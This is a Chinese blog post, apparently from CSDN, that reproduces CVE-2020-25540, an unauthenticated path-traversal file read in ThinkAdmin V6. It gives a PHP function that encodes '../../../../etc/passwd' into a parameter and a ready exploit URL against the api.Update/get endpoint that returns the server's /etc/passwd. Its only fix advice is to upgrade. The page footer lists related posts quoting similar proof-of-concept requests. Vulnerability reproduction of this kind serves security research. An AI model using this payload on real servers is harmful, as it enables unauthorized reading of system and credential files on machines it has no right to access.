ThinkAdmin任意文件读取(CVE-2020-25540)

于 2024-01-23 09:29:52 发布
阅读量525 收藏 9
点赞数 8
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135763396
版权
ThinkAdminV6中的权限管理系统存在路径遍历漏洞,源于API中危险函数未做限制。攻击者可通过构造恶意请求读取服务器文件。建议升级至最新版本以修复这一安全问题。
摘要由CSDN通过智能技术生成

漏洞描述:

ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。

ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未作任何认证可以直接调用api中此两危险函数。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的文件。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.构造payload

<?php

function encode($content){

list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];

for ($i = 0; $i < $length; $i++)

$chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);

return $chars;}$content="../../../../etc/passwd";

echo encode($content);

?>

3.访问

http://ip:port/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s

获取/etc/passwd的base64编码

4.base64解码

修复建议:

1.升级版本。

慕筱蚺
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkAdmin漏洞(CVE-2020-25540 )复现
锋刃科技的博客
10-18 5256
简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞概述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 影响版本 ThinkAdmin版本小于 ≤ 2020.08.03.01 环境搭建 使用phpstudy进行安装 设置阿里云 Composer 代理 composer config -g repo.packagist c...
thinkadmin V6 Experiences
FengQingYunLing的专栏
05-03 508
全文搜索以下代码:<input class="layui-input validate-error" required="" pattern="^\S{4,}$" vali-name="登录账号" name="username" autofocus="" autocomplete="off" placeholder="登录账号">,去除 【pattern="^\S{4,}$"】正则项即可。2、单个时间属性使用:data-date-input,开始结束时间属性使用:data-date-range。
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现
weixin_39811856的博客
10-29 862
一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、影响范围: Thinkadmin版本小于 ≤ 2020.08.03.01 三、漏洞复现: 利用POC去打(burp直接放包不能成功回去.
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 3014
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
ThinkAdmin列目录/任意文件读取CVE-2020-25540 )漏洞复现及环境搭建
yzl_007的博客
08-03 2446
ThinkAdmin列目录/任意文件读取CVE-2020-25540 )漏洞复现 漏洞介绍 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 影响范围 Thinkadmin2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) ThinkAdmin6环境搭建 这里我使用的是kali linux靶机来搭建环境 1、安装php环境 查看版本发现没有,按照要求
ThinkAdmin任意文件读取漏洞(CVE-2020-25540
MD@@nr丫卡uer
02-04 718
简述 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统 漏洞描述 ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。 漏洞复现 fofa搜索语句 app="ThinkAdmin" POC POST /admin/login.html/?s=admin/api.Update/node HTTP/1.1 Host: 127.0.0.1 Content-Length: 21 Cach
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4749
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 573
春秋云镜 CVE-2020-25540
云镜CVE-2020-25540复现
m0_46684679的博客
02-26 637
Thinkadmin v6任意文件读取漏洞
ThinkAdminCVE-2020-25540)漏洞复现
m0_48520508的博客
11-09 1891
0x00简介 ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 非常适用快速二次开发,默认集成 微信开发组件,支持微信服务号,微信支付,支付宝支付,阿里云OSS存储,七牛云存储,本地服务器存储。,ThinkAdmin的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。 0x01漏洞概述 ThinkAdmin V6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,且未作任何限制。未
ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现
Adminxe的博客
09-23 945
0x00 简介 ThinkAdmin是基于 ThinkPHP 的微信后台管理平台 0x01 影响版本 ThinkAdminV6 0x02 漏洞复现 POC: POST /admin.html?s=admin/api.Update/node HTTP/1.1 Host: xxx.xxx.xxx.xxx User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: te..
Think.PHP框架漏洞复现
最新发布
m0_71300782的博客
09-13 963
2.服务器启动先cd到thinkphp文件夹下面的5-rce里面,然后docker-compose up -d 安装环境3.进入浏览器ip地址加8080看见。
CVE-2020-25540)Thinkadmin v6任意文件读取漏洞复现
thelostworld
09-24 907
Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)复现 ​ 快结束,抓住HVV的小尾巴,现在有空去复现最近出的漏洞 一、漏洞简介: ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统,ThinkAdmin 的权限管理基于标准RBAC简化而来,去除了繁杂的节点管理,使得权限管理起来更简单,具体包含节点管理、权限管理、菜单管理、用户管理。ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。 二、..
ThinkAdmin6部分
three_six_nine__的博客
08-06 1184
ThinkAdmin6
Tomcat 文件读取漏洞(CVE-2020-1938) 如何处理
09-09
对于Tomcat文件读取漏洞(CVE-2020-1938),以下是一些处理方法: 1. 更新Tomcat版本:确保您使用的Tomcat版本已修复了该漏洞。Apache官方发布了修复程序的Tomcat版本,您应该升级到最新版本。 2. 配置安全限制:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值